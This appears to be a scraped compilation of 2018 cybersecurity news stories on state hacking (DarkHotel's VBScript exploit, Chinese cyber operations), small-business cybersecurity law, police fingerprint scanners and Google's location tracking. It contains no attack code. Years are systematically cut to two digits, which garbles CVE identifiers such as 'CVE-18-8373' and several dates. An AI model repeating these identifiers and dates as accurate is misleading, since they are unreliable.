North Korean Hackers Exploit Recently Patched Zero-Day
21.8.18 securityweek  BigBrothers  
Exploit 

North Koren hackers are exploiting a recently patched vulnerability in Microsoft's VBScript engine vulnerability in live attacks, security researchers say.

Tracked as CVE-18-8373, the bug was identified as a memory corruption issue that would result in remote code execution in the context of the current user. The flaw resides in the manner in which the VBScript scripting engine handles objects in memory in Internet Explorer.

“[A]n attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine,” Microsoft said.

Impacting the VBScript engine in the latest versions of Windows, the vulnerability does not affect Internet Explorer 11, as “VBScript in Windows 10 Redstone 3 (RS3) has been effectively disabled by default,” Trend Micro, the security firm that discovered the flaw last month, says.

The security company also notes that the discovered exploit sample uses the same obfuscation technique as exploits for CVE-18-8174, a VBScript engine remote code execution flaw that Microsoft addressed in May.

The method for exploiting CVE-18-8373 and running shellcode is also similar to the CVE-18-8174 exploits, which further suggests that the same author is behind both. The creator used a new use-after-free (UAF) vulnerability in vbscript.dll, which remained unpatched in the latest VBScript engine, Trend Micro says.

Last week, Dustin Childs, communications manager for the ZDI, told SecurityWeek that the similarities between these flaws seem more than coincidental. He also pointed out that further exploits could emerge from the same group.

While Trend Micro did not attribute the attacks to a specific actor, Qihoo 360’s security researchers claim that the North Korean threat actor known as DarkHotel is behind both exploits.

The researchers say the domain name used by the zero-day exploit is the same they observed in May being used for CVE-18-8174’s exploitation and that it is indeed linked to DarkHotel.

Qihoo 360, which has been tracking DarkHotel for a while, appears confident that this is the threat actor that has been exploiting CVE-18-8373 since before it was patched.

“Based on our analysis, this vulnerability can be steadily exploited. Moreover, since it is the second VB engine exploit found in the wild this year, it is not far-fetched to expect other vulnerability findings in the VB engine in the future,” Trend Micro said.

First detailed in 2014, the DarkHotel advanced persistent threat (APT) actor was recently said to be connected to the infamous Lazarus Group. Based on the reuse of code between various malware families attributed to North Korean actors, Intezer and McAfee concluded that most of the malicious tools link back to Lazarus.


China Believes Its Cyber Capabilities Lag Behind US: Pentagon
21.8.18 securityweek BigBrothers

China believes its cyberwarfare capabilities lag behind the United States, but it’s working on closing the gap, according to the U.S. Department of Defense (DOD).

In its annual report to Congress, the Pentagon describes the cyber capabilities and cyber operations of the People's Liberation Army (PLA), and warns that China continues to launch cyberattacks against organizations around the world, including in the United States.

The PLA sees cyberspace as one of the four critical security domains and it has taken steps to make improvements in this area, the report says.

“China believes its cyber capabilities and personnel lag behind the United States and is working to improve training and bolster domestic innovation to overcome these perceived deficiencies and advance cyberspace operations,” the Pentagon noted.

One of the steps taken by the PLA in an effort to improve its cyber capabilities is the creation of the Strategic Support Force (SSF). Believed to have been established in 2015, the SSF’s role is to centralize the military’s space, cyber and electronic warfare missions.

“The establishment of the SSF may represent the first step in developing a cyber force that creates efficiencies by combining cyber reconnaissance, attack, and defense capabilities into one organization,” the report reads. “PLA writings acknowledge the benefits of unifying leadership, centralizing cyber resource management, and combining offensive and defensive cyber capabilities in one military organization, and cite U.S. Cyber Command as accomplishing such a consolidation.”

According to the Pentagon, the Chinese military distinguishes between wartime and peacetime cyber operations. The former focuses on helping the PLA understand its enemy’s trend, plan combat operations, and “ensure victory on the battlefield.” During peacetime, the focus is on defending cyberspace and electromagnetic space.

“[PLA writings] suggest that China is prepared to use cyber operations to manage the escalation of a conflict, as they view cyber operations as a low-cost deterrent and can demonstrate capabilities and resolve to an adversary,” the DoD says.

The Chinese military’s cyber warfare strategy involves targeting an adversary’s command and control (C&C) and logistics networks in an effort to disrupt its ability to operate. The PLA noted that attacking C&C systems has the potentially to paralyze the enemy and gain superiority on the battlefield.

“Accordingly, the PLA may seek to use its cyberwarfare capabilities to collect data for intelligence and cyber attack purposes; to constrain an adversary’s actions by targeting network-based logistics, communications, and commercial activities; or to serve as a force- multiplier when coupled with kinetic attacks during times of crisis or conflict,” the report says.

Threat actors based in China continued to target computers around the world through 2017, including systems belonging to the DOD and other U.S. government agencies, with a focus on accessing networks and extracting information.

“China can use the information to benefit China’s defense high-technology industries, support China’s military modernization, provide the [Chinese Communist Party] insights into U.S. leadership perspectives, and enable diplomatic negotiations, such as those supporting China’s Belt and Road Initiative,” the DOD says in its report. “Additionally, targeted information could enable PLA cyber forces to build an operational picture of U.S. defense networks, military disposition, logistics, and related military capabilities that could be exploited prior to or during a crisis. The accesses and skills required for these intrusions are similar to those necessary to conduct cyber operations in an attempt to deter, delay, disrupt, and degrade DoD operations prior to or during a conflict.”


China’s Belt and Road project (BRI) is a driver of regional cyber threat activity
20.8.18 securityaffairs BigBrothers

Security experts have observed increasing cyber espionage activity related to China’s Belt and Road Initiative (BRI).
The alarm was launched by the experts from cybersecurity firms FireEye and Recorded Future.

China’s Belt and Road Initiative (BRI) is a development project for the building of an infrastructure connecting countries in Southeast Asia, Central Asia, the Middle East, Europe, and Africa.

For this reason, the project is considered strategic for almost any intelligence Agency.

FireEye defined it as a “driver of regional cyber threat activity”, experts warn of a spike in espionage operations aimed at gathering info in the project.

Cyber spies are already targeting organizations from various sectors that are involved in the project.

“Cyber espionage activity related to the initiative will likely include the emergence of new groups and nation-state actors. Given the range of geopolitical interests affected by this endeavor, it may be a driver of emerging nation-state cyber actors to use their capabilities,” reads a report published by FireEye.

FireEye uncovered an espionage campaign carried out by the China-linked APT group dubbed Roaming Tiger.

The Roaming Tiger campaign was discovered by experts at ESET in 2014, in December 2015 experts uncovered a cyber espionage campaign aimed at Russian organizations.

The APT group targeted entities in Belarus using specially crafted documents that referenced the Chinese infrastructure project as a bait.

FireEye observed the use of several malicious codes against organizations involved in the BRI project.

Chinese hackers used the TOYSNAKE backdoor to target several European foreign ministries. According to FireEye, another malware tracked as BANECHANT was used to target Maldives, a strategic center for financial investments related to BRI, meanwhile the LITRECOLA malware was used in attacks against Cambodia and the SAFERSING malware was involved in campaigns against international NGOs.

Experts also mentioned the recent attacks powered by the TEMP.Periscope group on the maritime industry.

“We expect BRI will also highlight the capabilities of emerging cyber actors across Asia and the Middle East and under what norms such nation-states sponsors will employ their capabilities,” FireEye said in its report. “Prior FireEye iSIGHT Intelligence reporting has noted that rising regional cyber actors, such as Vietnam, have been willing to employ their espionage capabilities against foreign corporations conducting business inside their borders. Similarly, there may be a willingness for other nation-state actors to aggressively target private sector organizations contributing to BRI.”

Researchers at Recorded Future also reported several attacks originating from China, precisely from the Tsinghua University.

The hackers targeted Tibetan community and many governments and private sector organizations worldwide.

The attacks launched from the Tsinghua University targeted Mongolia, Kenya, and Brazil, that “are key investment destinations as part of China’s Belt and Road Initiative.”

“During the course of our research, we also observed the Tsinghua IP scan ports and probe government departments and commercial entities networks in Mongolia, Kenya, and Brazil. Each of these countries are key investment destinations as part of China’s Belt and Road Initiative.” states the report published by Recorded Future.

“We assess with medium confidence that the consistent reconnaissance activity observed from the Tsinghua IP probing networks in Kenya, Brazil, and Mongolia aligns closely with the BRI economic development goals, demonstrating that the threat actor using this IP is engaged in cyberespionage on behalf of the Chinese state,”

BRI

The appendix in the PDF report published by Recorded Future includes a full list of the associated indicators of compromise.


China's 'Belt and Road Initiative' Drives Cyber Spying
17.8.18 securityweek BigBrothers

Cybersecurity firms have observed increasing cyber espionage activity related to China’s Belt and Road Initiative, and researchers expect to see more of these operations in the upcoming period.

China’s Belt and Road Initiative (BRI) is a trillion-dollar development project focused on building infrastructure connecting roughly 70 countries across Asia, Europe and Africa.

Intelligence-focused cybersecurity firms Recorded Future and FireEye this week warned of attacks apparently coming from China and related to the BRI.

FireEye believes that the project will be a “driver of regional cyber threat activity”. Based on historic activity, the company expects threat actors to target organizations in the government, academic, energy, transportation, construction, manufacturing, mining and financial sectors.

FireEye says it has already seen evidence of an increase in cyber espionage operations related to the BRI.

“Cyber espionage activity related to the initiative will likely include the emergence of new groups and nation-state actors. Given the range of geopolitical interests affected by this endeavor, it may be a driver of emerging nation-state cyber actors to use their capabilities,” FireEye said in a report provided to customers and shared with SecurityWeek.

One of the campaigns spotted by FireEye that may be related to the BRI was conducted by a China-linked threat group dubbed Roaming Tiger, which has been known to target high profile organizations in Russia and former Soviet Union countries. Some recent Roaming Tiger attacks aimed at Belarus attempted to deliver malware using specially crafted documents that referenced the Chinese infrastructure project. Belarus is one of the countries targeted by the Belt and Road Initiative.

Other China-linked campaigns observed by FireEye that appear related to the BRI involved the TOYSNAKE backdoor targeting multiple European foreign ministries; the BANECHANT malware targeting Maldives, which has been a focal point of development and financial investments related to BRI; the LITRECOLA malware targeting Cambodia, which is a vital node in the Belt and Road network; the SAFERSING malware targeting international NGOs; and the TEMP.Periscope group targeting the maritime industry.

“We expect BRI will also highlight the capabilities of emerging cyber actors across Asia and the Middle East and under what norms such nation-states sponsors will employ their capabilities,” FireEye said in its report. “Prior FireEye iSIGHT Intelligence reporting has noted that rising regional cyber actors, such as Vietnam, have been willing to employ their espionage capabilities against foreign corporations conducting business inside their borders. Similarly, there may be a willingness for other nation-state actors to aggressively target private sector organizations contributing to BRI.”

A report published on Thursday by Recorded Future details several attack campaigns apparently originating from the Tsinghua University, an elite Chinese academic institution.

The attacks have been aimed at the Tibetan community and various government and private sector organizations around the world.

Researchers noted that some of the countries targeted in attacks originating from this university, specifically Mongolia, Kenya, and Brazil, “are key investment destinations as part of China’s Belt and Road Initiative.”

“We assess with medium confidence that the consistent reconnaissance activity observed from the Tsinghua IP probing networks in Kenya, Brazil, and Mongolia aligns closely with the BRI economic development goals, demonstrating that the threat actor using this IP is engaged in cyberespionage on behalf of the Chinese state,” Recorded Future said in its report.


U.S. and Chile Agree to Cooperate on Cyber Security
17.8.18 securityweek BigBrothers

SANTIAGO, Chile (AP) — U.S. Defense Secretary Jim Mattis and his Chilean counterpart have signed an agreement pledging closer cooperation in combating cyber threats.

Mattis and Defense Minister Alberto Espina held a signing ceremony Thursday after meeting to discuss a range of security issues, including military exercises and cooperation in science and technology. Cyber defense is a topic of growing interest throughout the Western Hemisphere. Banco de Chile, one of the country's biggest commercial banks, has said a hacking operation robbed it of $10 million in June.

Santiago was the fourth stop for Mattis on a tour of South America that began in Brasilia on Sunday. He also visited Rio de Janeiro and Buenos Aires and is scheduled to hold talks in Bogota, Colombia, on Friday.


NIST Small Business Cybersecurity Act Becomes Law
16.8.18 securityweek BigBrothers

The NIST Small Business Cybersecurity Act Aims to Provide Cyberdefense Resources

U.S. President Donald Trump signed the NIST Small Business Cybersecurity Act, S. 770 (formerly known as the MAIN STREET Cybersecurity Act) into law on Tuesday (August 14, 18). It requires NIST to "disseminate clear and concise resources to help small business concerns identify, assess, manage, and reduce their cybersecurity risks."

The resources to be provided are informational. They must be generally applicable to a wide range of small businesses; vary with the nature and size of small businesses; promote cybersecurity awareness and workplace cybersecurity culture; and include practical application strategies. The resources must further be technology-neutral and compatible with COTS solutions; and as far as possible consistent with international standards and the Stevenson-Wydler Technology Innovation Act of 1980.

Use of these resources by small businesses is voluntary.

The bi-partisan act was authored by U.S. Senators Brian Schatz (D-Hawai'i) and James Risch (R-Idaho), and co-sponsored by Senators John Thune (R-S.D.), Maria Cantwell (D-Wash.), Bill Nelson (D-Fla.), Cory Gardner (R-Colo.), Catherine Cortez Masto (D-Nev.), Maggie Hassan (D-N.H.), Claire McCaskill (D-Mo.), and Kirsten Gillibrand (D-N.Y.).

"As businesses rely more and more on the internet to run efficiently and reach more customers, they will continue to be vulnerable to cyberattacks. But while big businesses have the resources to protect themselves, small businesses do not, and that's exactly what makes them an easy target for hackers," said Schatz, lead Democrat on the Commerce Subcommittee on Communications Technology, Innovation, and the Internet, in a statement. "This new law will give small businesses the tools to firm up their cybersecurity infrastructure and fight online attacks."

The act has been well-received by the security industry.

"Bills focusing on the cybersecurity needs of small businesses are becoming increasingly necessary to protect activity crucial to the U.S. economy," explains Jessica Ortega, a member of the SiteLock research team. "Small businesses account for 99.7% [SBA figures] of employers in the United States and as many as 50% [CNBC figures] of those have experienced a cyberattack. Not surprising when you consider that websites are attacked as many as 50 times per day on average [Sitelock's own figures].

She adds, "The NIST Small Business Cybersecurity Act aims to provide cyberdefense resources for small businesses by creating a set of guidelines for basic security measures that should be easy to follow and implement affordably. It also creates guidelines for making security best practices a required component of corporate training and workplace culture, something that is very needed as cyberthreats continue to evolve."

Small businesses, and many large organizations, struggle to comply with the existing NIST Security Framework. "This change sets the stage for greater compliance and readiness from smaller organizations who previously thought that NIST compliance was too costly or complex to obtain," adds Dr. Bret Fund, founder and CEO at SecureSet.

The basic problem is small organizations cannot afford extensive cybersecurity resources in-house, while many still believe they will not be a target for cyber attackers. "Small businesses are not immune to threats, and are often not equipped with the IT resources or personnel to protect their networks," warns Dirk Morris, chief product officer at Untangle. Small businesses are a major direct target for business email compromise (BEC) and ransomware https://www.securityweek.com/ransomware-where-its-been-and-where-its-going attacks; and as part of the supply chain for larger organizations they are targeted for both credential theft and island-hopping to the larger target.

Counterintuitively, small businesses suffer more from a successful attack than do the larger companies. "In fact," suggests Anupam Sahai, Vice President of Product Management at Cavirin, "recent reports shows that smaller businesses lose proportionately more to cyberattacks since they are targeted just as often, and are less able to recover due to less resilient infrastructures."

The same report highlighted by Sahai also points out that smaller companies paying lower salaries have a proportionately higher number of grey hats working for them, making them more susceptible to insider threats.

While the security industry generally applauds this new act, it still suffers from one major drawback -- use of the new NIST resources by small businesses is voluntary.

"I will be curious to see how this plan is carried out," says Francis Dinha, CEO and co-founder of OpenVPN. "Many small businesses neglect cyber security because they aren't aware and don't understand the risks -- so, they don't seek out solutions. But if they're not seeking out solutions now, what makes anyone think they will seek out these new NIST resources?"

The act, he says, "does not seem to specify how to connect or engage with small businesses in these practices. It only requires NIST to make resources, in the form of guidelines, methodologies, and other information, available online. I'm concerned this won't be enough. If small businesses aren't engaged in a more active way, they may miss this opportunity and remain at risk."

A complaint often heard at SecurityWeek from harassed CISOs is, "If it's not a regulation, it won't happen." Perhaps what is required as a next step is a small business cybersecurity framework that can be audited. Larger organizations can then insist that smaller companies they engage must show compliance to the NIST small business cybersecurity framework -- but even that will create problems. Small companies with great new ideas will continue to develop their idea without intrinsic security -- and the larger companies will have to choose between a great new non-conformant idea and an older conformant solution.

This new act is a great help in assisting those small businesses that wish to improve their cybersecurity to do so. But it needs to be made a requirement before it will seriously improve the overall cybersecurity posture of the nation.


Senate Passes MAIN STREET Cybersecurity Act for Small Business
16.8.18 securityweek BigBrothers

The U.S. Senate has passed the MAIN STREET Cybersecurity Act on Sept. 28, which will require NIST to "disseminate clear and concise resources to help small business concerns identify, assess, manage, and reduce their cybersecurity risks."

Co-sponsored by Senators Maria Cantwell (D-WA), Brian Schatz (D-HI), James Risch (R-ID), John Thune (R-SD) and Bill Nelson (D-Fla.), and introduced in March 2017, MAIN STREET's full title is 'Making Available Information Now to Strengthen Trust and Resilience and Enhance Enterprise Technology Cybersecurity Act of 2017'.

The basic requirement is that NIST shall provide cybersecurity resources specifically geared for small businesses (SMEs). Those resources are to promote awareness of simple, basic controls; a workplace cybersecurity culture; and third-party stakeholder relationships, in order to assist SMEs in mitigating common cybersecurity risks. The resources are to be technology-neutral that can be implemented using commercial and off-the-shelf technologies.

They are to be consistent with the requirements of the Cybersecurity Enhancement Act of 2014, which gave more weight and support to the NIST Cybersecurity Framework. While widely used by large organizations, the NIST framework is usually ignored by SMEs.

In a statement of support for MAIN STREET issued in March, Sen. John Thune, chairman of the Senate Committee on Commerce, Science, and Transportation, pointed out that SMEs provide more than half of all jobs in the U.S., but are unprepared for the effect of cyberattacks. According to figures from the National Cybersecurity Alliance, 60% of small businesses are forced to close following an attack.

"Cyberattacks can have catastrophic effects on small businesses and their customers," he said. "This legislation offers important resources, specifically meeting the unique needs of small businesses, to help them guard sensitive data and systems from thieves and hackers."

"In 2012, nearly 71 percent of cyberattacks occurred in businesses with fewer than 100 employees," said Senator Risch. "These attacks seriously compromise not only the businesses, but also their employees' and customers' personal information. As we work to reduce our nation's cyber vulnerabilities, we must be equally mindful of our responsibility to uniformly educate all small business owners on how to deter these threats."

The small business version of the NIST Framework will need to provide a cybersecurity framework that does not require the high level of investment needed for the full NIST Framework. However, like the full version, it will be voluntary for business. Whether SMBs actually derive practical benefit remains to be seen.

The Ponemon 2016 State of Cybersecurity in SMBs survey found that 50% of small businesses had suffered a data breach in the previous 12 months. SMEs are clearly a target for cybercriminal attacks, but are unprepared to stop them. The primary reasons are twofold: SMEs often think they are too small to be a target, and that effective security can only be achieved with the resources of a large organization.

The first is simply wrong: small businesses are increasingly targeted for extortion (such as ransomware) and credential theft (especially where that business might be part of the supply chain of larger organizations). It is hoped that the new small business Cybersecurity Act will change the second.

A survey of 1,420 small business owners published in March 2017 by Manta suggests that only 69% of small business owners currently have controls in place to prevent hacks -- meaning 1 in 3 small business owners have no safeguards in place. Where controls are used, they tend to be basic: such as antivirus software (17%), firewalls (16%), and spam filters (14%).

"Overall," concludes Manta, "with the growth in hackers targeting small businesses, owners should invest more heavily in cyber defense to prevent attacks, which can often be more crippling for a small business than a large corporation."

Andy Halataei, Senior Vice President for Government Affairs of the Information Technology Industry Council, said at the time the bill was introduced, "Small businesses often don't have the resources they need to guard against sophisticated cyber-attacks, and this legislation can be the helping hand small businesses need to help reduce their cybersecurity risks." He added, "By offering small businesses federal agencies' resources and coordinated support, they can better manage risks, protect customer privacy, and focus on growing their ventures."

The reality for small businesses today is that they face threats from both criminals and government legislation. Legal regulatory requirements, like common cybercriminals, do not differentiate hugely between large and small businesses. For example, any business of whatever size that does business with a member state of the European Union will be subject to the strict requirements of the European General Data Protection Regulation (GDPR) by May 18.

The MAIN STREET Cybersecurity Act of 2017 will hopefully help SMEs protect themselves from both hackers and regulators. It is expected that this Act will rapidly pass through the final stages to become law.


FBI Eyes Plethora of River-Related Threats
15.8.18 securityweek BigBrothers

NEW ORLEANS (AP) — Giant cranes loading and unloading gargantuan barges. Oil tankers, supply vessels and pipelines serving a vital energy industry. Flood control structures. Chemical plants. Cruise ships. Drinking water sources. All computer-reliant and tied in some way to the internet. All of them vulnerable to cyber thieves, hackers and terrorists.

Roughly nine months into his job as special agent in charge of the New Orleans office of the FBI, agent Eric Rommal is keenly aware of the dangers cyber-criminals pose to Mississippi River-related businesses and south Louisiana infrastructure.

"Louisiana is a major cyber vulnerability area," Rommal told The Associated Press in an interview.

"Every time that we have a vessel that travels up or down the Mississippi River there's a vulnerability: that that vessel or persons on those vessels may in fact be doing harm to our systems," said Rommal. "And that affects the national economy and affects the entire United States."

Rommal, accompanied by Matthew Ramey, who supervises the office's cyber squad, and Drew Watts, an assistant special agent in charge, discussed a litany of vulnerable areas and the ways the FBI in New Orleans works to protect them.

COMMERCE

"When it relates to commerce and the economy throughout the United States, oil and gas — it all starts here," said Rommal. "And when those systems are compromised, it doesn't just affect Louisiana. It affects the entire nation."

ICS Cyber Security Conference

A cyber disruption of security systems that protect pipelines and refineries "could essentially cripple the oil and gas industry until we could get that system up and running again," said Rommal.

Energy isn't the only concern.

"The ports that are along the Mississippi River — many may think of them as an agricultural or a petroleum depot. But what we need to know more about is that each one of those systems is controlled by sort of computer network that allows barges to be off-loaded, loaded," he said.

A hacker disrupting those operations could effectively disrupt nationwide and international commerce, he said, until it could be manually restored.

THEFT

Ports and the businesses that use them are susceptible to theft of money or critical information, Ramey said. And the theft can be state-sponsored.

"That would be, say, the Chinese, the Russians, the Iranians, the North Koreans, want to compromise the ports for, say, some sort of economic or secretive information. The maritime and the port industry are susceptible to what we call BEC — business email compromises," Ramey said.

"Wire transfers are going out all the time, 24/7. If the attacker can insert himself into that email chain, they can assume the identity of the person who controls that account." And that can lead to money being diverted to unintended sources.

FBI statistics show some 41,000 victims lost $2.9 billion to cyber-thieves nationally from October 2013 to May 18, said Ramey. Over $5 million left the state in 2017 due to cyber-thieves, he said, adding: "In 18, we're on track to surpass that."

TERRORISM

Offshore there are drilling rigs and production platforms. Inland, refineries and chemical plants line the river. Compromise of their computer systems and safety systems could lead to disaster, Rommal said.

"We're confident that the internal security systems owned by each one of those companies have mitigation plans to prevent terrible disasters from happening," he said. "But, nonetheless, it's something that we think about every day."

In addition, the agents acknowledged threats to public utilities — New Orleans, for instance, draws its drinking water from the river — and various flood-control structures and pumping systems.

Register for SecurityWeek’s ICS Cyber Security Conference

THE FIGHT

Rommal said more than 20 people working for the FBI headquarters in Louisiana are working on cyber security.

They include experts working at forensics labs, doing forensics on computer hard drives and developing techniques for analyzing computer memories in efforts to fight and find intruders.

And, Rommal said, there are partnerships with other federal agencies, including a joint effort known as the National Cyber Investigative Joint Terrorism Task Force.

There is also the national InfraGard, an FBI program that enlists thousands of private-industry partners from potential cybercrime target sectors, such as such as transportation, energy, banking and infrastructure. Ramey said there are 800 members in Louisiana.

Participants can provide and receive real-time information on imminent cyber threats.

The FBI also maintains a website for its Internet Crime Complaint Center. It's a mechanism for businesses and individuals to report cybercrime, and a source of information on the ever-evolving threat.

"We're not in this fight alone," said Rommal. "And it is a fight."


UK Police Deploy Homemade Mobile Fingerprint Scanners
15.8.18 securityweek BigBrothers

The UK Metropolitan Police Service -- the Met, the UK's largest police force and one of the largest in the world -- has introduced a new portable fingerprint scanner. This is not the first portable scanner used by the Met, but differs from the earlier option by being developed in-house.

Known as INK (identity not known), it combines software produced in-house by Met staff with an Android mobile phone paired with a Cross Match Technologies fingerprint reader. The device communicates securely with the Home Office Biometric Services Gateway (BSG), which then searches the Criminal Records Office (IDENT1) and immigration enforcement (IABS) databases.

If a suspect has a criminal record, the Met says, or is known to immigration enforcement, his or her identity can be confirmed at the roadside. An officer, with relevant access levels, can also use the device to check the Police National Computer to establish if they are currently wanted for any outstanding offences.

The statement made it clear that all fingerprints taken on the device are deleted automatically once the officer logs off the device. The 2017 Vault 7 CIA documents leaked by WikiLeaks seem to indicate that the CIA used a tool called ExpressLane to surreptitiously collect biometric data recorded by other Cross Match devices in the U.S.

Miami-based Cross Match Technologies provides biometric management systems to law enforcement and governments. In 2011 it was reported that a Cross Match device was used to identify Osama Bin Laden, allowing then president Obama to announce his death.

UK Met Police Fingerprint scanner

For now, the Met devices cannot be used to increase the size of the national fingerprint database regardless of whether the subject is convicted of a crime. However, there seems little to prevent this development in the future.

The Police and Criminal Evidence Act 1984 (PACE) allows fingerprints to be taken if a constable reasonably suspects the subject of committing or attempting to commit an offence, or they have committed or attempted to commit an offence, and: the name of the person is unknown to, and cannot be readily ascertained by, the constable -- or if the constable has reasonable grounds for doubting whether a name given by the person is their real name.

Again under PACE, fingerprints may be stored by the police for 2-3 years (more if the courts grant an extension) or indefinitely if the subject is subsequently convicted of an offense. However, it is worth noting that European attitudes towards fingerprinting are changing. In April 18, the European Commission proposed that all identity cards held by European citizens should be required to include a digital image of the holder's fingerprints.

The driving force behind the new scanners is, however economy of both police funds and officers' time. Project lead Superintendent Adrian Hutchinson, explained, "Mobile identification technology helps officers to do their jobs efficiently and effectively. For example, if police stop a driver for a traffic violation but the driver has no documents on him and the car is registered to another person officers may not be happy that the name given is correct. INK can allow them to confirm the identity to allow the service of a summons, rather than arrest them and take them to a police station where they then confirm their identity. Also, if the person is wanted for other offences, this device will allow us to establish this at the point they are stopped."

The reduced cost of the new devices will allow the Met to increase their usage from less than 100 to 600 devices in the field, to be rolled out over the next six months. It is believed that the failure rate for a scanned fingerprint is around one in 7,000.

It is not immediately clear whether this is the same device that was described by the West Yorkshire Police earlier this year. On 10 February, the Home Office announced, "An app on an officer's phone, combined with a handheld scanner, will mean police will be able to check fingerprints against both criminal and immigration records by connecting to the two live databases (IDENT1 and IABS) via the new Biometric Services Gateway... It is expected that another 20 forces across the country will roll out the system by the end of this year."

A Westminster press conference that would answer such details, scheduled for Tuesday was canceled following an incident at Westminster on Monday evening. A vehicle was driven at speed into crash barriers outside the Houses of Parliament, injuring several pedestrians and cyclists. It is being treated as terror-related and investigated by the Met's counter-terrorism police -- who have said that the identity of the driver is not yet confirmed.


Google tracks users’ movements even if they have disabled the “Location History” on devices
14.8.18 securityaffairs BigBrothers

According to the AP, many Google services on both Android and iPhone store records of user location even if the users have disabled the “Location History”.
According to a recent investigation conducted by the Associated Press, many Google services on both Android and iPhone devices store records of user location data, and the bad news is that they do it even if the users have disabled the “Location History” on devices.

When a user disables the “Location History” from the privacy settings of Google applications, he should prevent Google from stole location data.

Currently, the situation is quite different, experts from AP discovered that even when users have turned off the Location History, some Google apps automatically store “time-stamped location data” without explicit authorization.

“Google says that will prevent the company from remembering where you’ve been. Google’s support page on the subject states: “You can turn off Location History at any time. With Location History off, the places you go are no longer stored.”

That isn’t true. Even with Location History paused, some Google apps automatically store time-stamped location data without asking. (It’s possible, although laborious, to delete it .)” reads the post published by AP.

“For example, Google stores a snapshot of where you are when you merely open its Maps app. Automatic daily weather updates on Android phones pinpoint roughly where you are,”

“And some searches that have nothing to do with location, like “chocolate chip cookies,” or “kids science kits,” pinpoint your precise latitude and longitude—accurate to the square foot—and save it to your Google account.”

The AP has used location data from an Android smartphone with ‘Location History’ disabled to desing a map of the movements of Princeton postdoctoral researcher Gunes Acar.

Location History

Data plotted on the map includes records of Dr. Acar’s train commute on two trips to New York and visits to the High Line park, Chelsea Market, Hell’s Kitchen, Central Park and Harlem other markers on the map, including Acar’s home address.

“The privacy issue affects some two billion users of devices that run Google’s Android operating software and hundreds of millions of worldwide iPhone users who rely on Google for maps or search.” continues the AP.
Google replied to the study conducted by the AP with the following statement:

“There are a number of different ways that Google may use location to improve people’s experience, including Location History, Web, and App Activity, and through device-level Location Services. We provide clear descriptions of these tools, and robust controls so people can turn them on or off, and delete their histories at any time.” states Google.

Jonathan Mayer, a Princeton researcher and former chief technologist for the FCC’s enforcement bureau, remarked that location history data should be disabled when the users switch off’ the Location History,

“If you’re going to allow users to turn off something called ‘Location History,’ then all the places where you maintain location history should be turned off. That seems like a pretty straightforward position to have.”

The good news is it is possible to stop Google from collecting your location, it is sufficient to turn off the “Web and App Activity” setting, anyway, Google will continue to store location markers.

Open your web browser, go to myactivity.google.com, select “Activity Controls” and now turn off the “Web & App Activity” and “Location History. features”

For Android Devices:
Go to the “Security & location” setting, select “Privacy”, and tap “Location” and toggle it off.

For iOS Devices:
Google Maps users can access Settings → Privacy Location Services and change their location setting to ‘While Using’ the app.


Google Tracks Your Movements, Like It or Not
13.8.18 securityweek BigBrothers

Google wants to know where you go so badly that it records your movements even when you explicitly tell it not to.

An Associated Press investigation found that many Google services on Android devices and iPhones store your location data even if you've used privacy settings that say they will prevent it from doing so.

Computer-science researchers at Princeton confirmed these findings at the AP's request.

For the most part, Google is upfront about asking permission to use your location information. An app like Google Maps will remind you to allow access to location if you use it for navigating. If you agree to let it record your location over time, Google Maps will display that history for you in a "timeline" that maps out your daily movements.

Storing your minute-by-minute travels carries privacy risks and has been used by police to determine the location of suspects — such as a warrant that police in Raleigh, North Carolina, served on Google last year to find devices near a murder scene. So the company will let you "pause" a setting called Location History.

Google says that will prevent the company from remembering where you've been. Google's support page on the subject states: "You can turn off Location History at any time. With Location History off, the places you go are no longer stored."

That isn't true. Even with Location History paused, some Google apps automatically store time-stamped location data without asking.

For example, Google stores a snapshot of where you are when you merely open its Maps app. Automatic daily weather updates on Android phones pinpoint roughly where you are. And some searches that have nothing to do with location, like "chocolate chip cookies," or "kids science kits," pinpoint your precise latitude and longitude — accurate to the square foot — and save it to your Google account.

The privacy issue affects some two billion users of devices that run Google's Android operating software and hundreds of millions of worldwide iPhone users who rely on Google for maps or search.

Storing location data in violation of a user's preferences is wrong, said Jonathan Mayer, a Princeton computer scientist and former chief technologist for the Federal Communications Commission's enforcement bureau. A researcher from Mayer's lab confirmed the AP's findings on multiple Android devices; the AP conducted its own tests on several iPhones that found the same behavior.

"If you're going to allow users to turn off something called 'Location History,' then all the places where you maintain location history should be turned off," Mayer said. "That seems like a pretty straightforward position to have."

Google says it is being perfectly clear.

"There are a number of different ways that Google may use location to improve people's experience, including: Location History, Web and App Activity, and through device-level Location Services," a Google spokesperson said in a statement to the AP. "We provide clear descriptions of these tools, and robust controls so people can turn them on or off, and delete their histories at any time."

To stop Google from saving these location markers, the company says, users can turn off another setting, one that does not specifically reference location information. Called "Web and App Activity" and enabled by default, that setting stores a variety of information from Google apps and websites to your Google account.

When paused, it will prevent activity on any device from being saved to your account. But leaving "Web & App Activity" on and turning "Location History" off only prevents Google from adding your movements to the "timeline," its visualization of your daily travels. It does not stop Google's collection of other location markers.

You can delete these location markers by hand, but it's a painstaking process since you have to select them individually, unless you want to delete all of your stored activity.

You can see the stored location markers on a page in your Google account at myactivity.google.com, although they're typically scattered under several different headers, many of which are unrelated to location.

To demonstrate how powerful these other markers can be, the AP created a visual map of the movements of Princeton postdoctoral researcher Gunes Acar, who carried an Android phone with Location history off, and shared a record of his Google account.

The map includes Acar's train commute on two trips to New York and visits to The High Line park, Chelsea Market, Hell's Kitchen, Central Park and Harlem. To protect his privacy, The AP didn't plot the most telling and frequent marker — his home address.

Huge tech companies are under increasing scrutiny over their data practices, following a series of privacy scandals at Facebook and new data-privacy rules recently adopted by the European Union. Last year, the business news site Quartz found that Google was tracking Android users by collecting the addresses of nearby cellphone towers even if all location services were off. Google changed the practice and insisted it never recorded the data anyway.

Critics say Google's insistence on tracking its users' locations stems from its drive to boost advertising revenue.

"They build advertising information out of data," said Peter Lenz, the senior geospatial analyst at Dstillery, a rival advertising technology company. "More data for them presumably means more profit."

The AP learned of the issue from K. Shankari, a graduate researcher at UC Berkeley who studies the commuting patterns of volunteers in order to help urban planners. She noticed that her Android phone prompted her to rate a shopping trip to Kohl's, even though she had turned Location History off.

"So how did Google Maps know where I was?" she asked in a blog postq.

The AP wasn't able to recreate Shankari's experience exactly. But its attempts to do so revealed Google's tracking. The findings disturbed her.

